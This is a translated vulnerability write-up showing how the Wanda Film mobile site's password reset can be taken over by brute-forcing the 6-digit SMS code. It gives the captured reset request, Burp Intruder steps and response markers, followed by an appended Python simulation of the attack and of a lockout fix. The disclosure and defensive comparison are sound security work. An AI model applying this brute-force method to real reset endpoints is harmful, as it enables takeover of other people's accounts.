Password reset vulnerability (and fix) for any account on the Wanda Film website

Source: Internet
Author: User

1. The main Wanda Film site has a strong CAPTCHA on its password-reset module, so there is no problem there.
2. The mobile site, http://m.wandafilm.com, is different: no CAPTCHA is deployed, so the password of any account can be reset by brute-forcing the SMS code (called the "SMS code" here to distinguish it from the image CAPTCHA). First open the mobile site and click [Member Center].
3. If you are not logged in, you are redirected to the login page, which shows a [Forgot password?] link. That got me interested.
4. Click it and enter the mobile phone number whose password is to be retrieved. I used my own number for this test.
5. Click [Get verification code]. The site jumps to the reset page and, at the same time, the phone receives a 6-digit SMS code, 745233. I entered a different 6-digit code, 111111, together with the new password, clicked Submit and captured the request. The page responds "Incorrect mobile phone verification code". The captured POST request is:

   POST /member/resetPassByToken.do HTTP/1.1
   Host: m.wandafilm.com
   Proxy-Connection: keep-alive
   Content-Length: 48
   Cache-Control: max-age=0
   Origin: http://m.wandafilm.com
   User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4
   Content-Type: application/x-www-form-urlencoded
   Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
   Referer: http://m.wandafilm.com/Member/findPass.do
   Accept-Encoding: gzip,deflate,sdch
   Accept-Language: zh-CN,zh;q=0.8
   Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
   Cookie: cityCodeCookies=3774659600; JSESSIONID=...; __utma=...; __utmb=81395784.33.10.1351810426; __utmc=81395784; __utmz=...

   mobileNo=<11-digit mobile number>&token=111111&newPass=222222

6. The mobileNo parameter is the phone number, token is the SMS code and newPass is the new password. As long as the token is guessed correctly, the password of that phone number is reset in a single request.
7. Next, replay the request: send the POST to the Intruder module of Burp Suite and mark token as the payload position to be brute-forced.
8. Because this was only a test, I started the brute force at 745200. When the token is wrong, the response contains "Wanda film _ System Busy"; wrong guesses can also be told apart by the response length.
9. Once the SMS code is hit, the response contains "Wanda movie Mobile _ password modified successfully".
10. Now log on with the account and the newly set password.



Solution:
1. There is in fact one small limit on the mobile password reset: the SMS code is only valid for 5 minutes. That is no real obstacle. A 6-digit code has only 1,000,000 candidates; if the network is fast enough for each thread to send one brute-force request per second, 10 machines with 1,000 concurrent threads each make 10,000 requests per second and exhaust the whole space in 100 seconds, under two minutes and well inside the 5-minute window.
2. The SMS code can stay 6 digits, or even 4; there is no need to add an image CAPTCHA or to shorten the validity period. But why not lock the reset request after five consecutive wrong codes?
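The following is an added example, not code from the report or from the Wanda Film site. It models the reset endpoint described in steps 5 to 9 as an in-process Python class (6-digit numeric code, 5-minute validity, no attempt limit) and runs an Intruder-style loop against it, classifying each reply by the same body text the report quotes; it then applies the fix from the Solution section (invalidate the code after five wrong guesses) and runs the identical loop again. The phone number, the LOCKED message and the in-memory storage are assumptions made for the simulation; no network traffic is sent.

```python
import hmac
import secrets
import time

# Response markers quoted in the report above.
BUSY = "Wanda film _ System Busy"
OK = "Wanda movie Mobile _ password modified successfully"
# Assumed message for the hardened version; the real site has no such response.
LOCKED = "Too many wrong codes, request a new one"

CODE_SPACE = 10**6  # a 6-digit numeric SMS code has one million candidates


class VulnerableReset:
    """Models m.wandafilm.com /member/resetPassByToken.do as the report describes it:
    6-digit numeric code, 5-minute validity, no CAPTCHA, no attempt limit."""

    TTL = 300  # seconds; the only limit the report found

    def __init__(self, now=time.time):
        self.now = now            # injectable clock so expiry can be tested
        self.codes = {}           # mobileNo -> (code, issued_at)
        self.passwords = {}       # mobileNo -> password, set on a successful reset

    def find_pass(self, mobile_no):
        """The [Get verification code] step. Returns the code only so that the
        demo can locate it; on the real site it goes out by SMS."""
        code = f"{secrets.randbelow(CODE_SPACE):06d}"
        self.codes[mobile_no] = (code, self.now())
        return code

    def reset_pass_by_token(self, mobile_no, token, new_pass):
        entry = self.codes.get(mobile_no)
        if entry is None or self.now() - entry[1] > self.TTL:
            return BUSY
        if token != entry[0]:
            return BUSY           # nothing is counted: the attacker may retry forever
        self.passwords[mobile_no] = new_pass
        del self.codes[mobile_no]
        return OK


class HardenedReset(VulnerableReset):
    """The fix proposed in the Solution section: invalidate the code after
    five wrong guesses, so one code gives the attacker at most 5 tries in a million."""

    MAX_ATTEMPTS = 5

    def __init__(self, now=time.time):
        super().__init__(now)
        self.attempts = {}        # mobileNo -> wrong guesses against the current code

    def find_pass(self, mobile_no):
        self.attempts[mobile_no] = 0
        return super().find_pass(mobile_no)

    def reset_pass_by_token(self, mobile_no, token, new_pass):
        entry = self.codes.get(mobile_no)
        if entry is None or self.now() - entry[1] > self.TTL:
            return BUSY
        if self.attempts[mobile_no] >= self.MAX_ATTEMPTS:
            del self.codes[mobile_no]   # burn the code; a fresh one must be requested
            return LOCKED
        self.attempts[mobile_no] += 1
        if not hmac.compare_digest(token.encode(), entry[0].encode()):
            return BUSY
        self.passwords[mobile_no] = new_pass
        del self.codes[mobile_no]
        return OK


def brute_force(server, mobile_no, new_pass, start=745200):
    """Intruder-style loop: walk the 6-digit space from `start`, wrapping around,
    and classify each reply by its body text just as the report did.
    Returns (token or None, number of requests sent)."""
    for i in range(CODE_SPACE):
        token = f"{(start + i) % CODE_SPACE:06d}"
        body = server.reset_pass_by_token(mobile_no, token, new_pass)
        if body == OK:
            return token, i + 1
        if body == LOCKED:
            return None, i + 1
    return None, CODE_SPACE


def demo(mobile_no="13800000000", new_pass="222222"):
    """Run the same attack against both servers. The phone number is made up.
    The search starts just past the real code, so the true code is the very
    last candidate: the attacker's worst case."""
    results = {}
    for name, server in (("vulnerable", VulnerableReset()), ("hardened", HardenedReset())):
        code = server.find_pass(mobile_no)
        start = (int(code) + 1) % CODE_SPACE
        found, tries = brute_force(server, mobile_no, new_pass, start)
        results[name] = {"code": code, "found": found, "tries": tries,
                         "password": server.passwords.get(mobile_no)}
    return results


if __name__ == "__main__":
    for name, r in demo().items():
        print(f"{name}: code={r['code']} found={r['found']} after {r['tries']} requests, "
              f"password now {r['password']!r}")
```

Against the vulnerable model the loop always succeeds, in the worst case after exactly one million requests, which is the figure the Solution's 10,000-requests-per-second estimate turns into under two minutes. Against the hardened model the sixth request already returns LOCKED and the code is gone, so the attacker must trigger a new SMS and start over with no knowledge carried across; the expiry check and the constant-time comparison are kept in both paths so that the response gives away nothing beyond hit or miss.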

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.